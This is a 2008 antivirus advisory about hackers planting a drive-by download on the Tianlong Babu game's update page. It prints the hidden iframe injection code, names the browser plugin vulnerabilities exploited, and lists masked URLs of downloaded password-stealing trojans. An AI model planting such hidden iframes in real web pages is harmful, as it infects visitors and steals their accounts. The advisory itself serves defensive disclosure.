首页 | 最新病毒 | 反病毒学院 | qq病毒专杀 | arp病毒 | MSN病毒 | auto病毒专杀 | U盘病毒 | downloader病毒 | 木马查杀 | 计算机病毒 | 最新漏洞   
您的位置: 首页 >> 木马查杀 >> 阅读资讯:天龙八部游戏网站挂马事件

天龙八部游戏网站挂马事件

[ 作者:安天 | 更新日期:2008-8-8 08:50:04 | 阅读次数: ]
8月7日,安天实验室发现,天龙八部游戏网站 (http://update.tl.sohu.com/tlbb/readme.htm)被黑客植入病毒,用户如果访问该网站,系统就会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户系统可能被远程控制,盗取用户敏感信息。甚至导致死机。
  天龙八部更新公告页面(http://update.tl.sohu.com/tlbb/readme.htm)多次被黑客植入恶意代码,从8月初到现在已经被挂马3次。
  从http://www.t****.cn/a0208291/a20.htm至http://www.t****.cn/a0208291/a20.htm均为挂马页面。
  该网站问题代码:

<iframe src=" http://www.t****.cn/a0208291/a20.htm" width="100" height="0"></iframe>
http://www.t****.cn/a0208291/a20.htm问题框架代码:

<iframe width=100 height=0 src=new.html></iframe>
http://www.t****.cn/a0208291/new.html网马代码:

以上加密网马解密后可知利用以下漏洞来传播:
MS06014漏洞 (clsid:BD96C556-65A3-11D0-983A-00C04FC29E36)
RealPlayer播放器IERPCtl.IERPCtl.1漏洞
联众世界游戏大厅所安装的GLCHAT.GLChatCtrl.1 ActiveX控件漏洞
Adobe Flash Player SWF文件漏洞
暴风影音II mps.dll ActiveX栈溢出漏洞
当用户访问http://up****.tl.sohu.com/tlbb/readme.htm时,系统会自动下载以下病毒文件:
http://cdn.e5****.com/upkk.exe           病毒名:(Trojan-Downloader.Win32.Agent.wps)
http://cdn.e5****.com/up01.exe           病毒名:(Trojan.Win32.Agent.xqr)
http://cdn.e5****.com/up01B.exe          病毒名:(Trojan-GameThief.Win32.OnLineGames.snpn)
http://cdn.e5****.com/up02.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.snvk)
http://cdn.e5****.com/up02B.exe          病毒名:(Trojan-GameThief.Win32.OnLineGames.snry)
http://cdn.e5****.com/up03B.exe          病毒名:(Trojan-GameThief.Win32.OnLineGames.snyb)
http://cdn.e5****.com/up05.exe           病毒名:(Trojan-Downloader.Win32.Zlob.sab)
http://cdn.e5****.com/up06.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.smjn)
http://cdn.e5****.com/up07.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.snvj)
http://cdn.e5****.com/up08.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.smjn)
http://cdn.e5****.com/up10.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.shig)
http://cdn.e5****.com/up11.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.soir)
http://cdn.e5****.com/up12.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.snvl)
http://cdn.e5****.com/up13.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.snpv)
http://cdn.e5****.com/up14.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.slae)
http://cdn.e5****.com/up15.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.slae)
http://cdn.e5****.com/up16.exe           病毒名:(Trojan-PSW.Win32.Agent.nr)
http://cdn.e5****.com/up17.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.soit)
http://cdn.e5****.com/up18.exe           病毒名:(Trojan.Win32.Agent.sav)
http://cdn.e5****.com/up19.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.smjn)
http://cdn.e5****.com/up20.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.snpw)
http://cdn.e5****.com/up21.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.snvl)
http://cdn.e5****.com/up22.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.soit)
http://cdn.e5****.com/up23.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.shhw)
http://cdn.e5****.com/up24.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.shhw)
http://cdn.e5****.com/up25.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.smjn)
http://cdn.e5****.com/up26.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.smjn)
http://cdn.e5****.com/up27.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.snnq)
http://cdn.e5****.com/up28.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.smjn)
http://cdn.e5****.com/up29.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.snvl)
http://cdn.e5****.com/tzt.exe            病毒名:(Trojan-Downloader.Win32.Agent.wps)

    以上病毒文件为下载者木马和游戏盗号木马,自动运行后将会,盗取用户敏感信息,甚至导致死机。由于下载数量太多,这里不一一分析。
Tags:天龙八部游戏网站 挂马
来源:
上一篇:SymbOS/Beselo.A,love.rm,sex.mp3病毒查杀  下一篇:Backdoor.Win32.Agent.ahj 分析
您的评论
用户名:新注册) 密码: 匿名评论 [所有评论]

·用户发表意见仅代表其个人意见,并且承担一切因发表内容引起的纠纷和责任
·本站管理人员有权在不通知用户的情况下删除不符合规定的评论信息或留做证据
·请客观的评价您所看到的资讯,提倡就事论事,杜绝漫骂和人身攻击等不文明行为
热点资讯

精彩推荐

最新资讯

随机推荐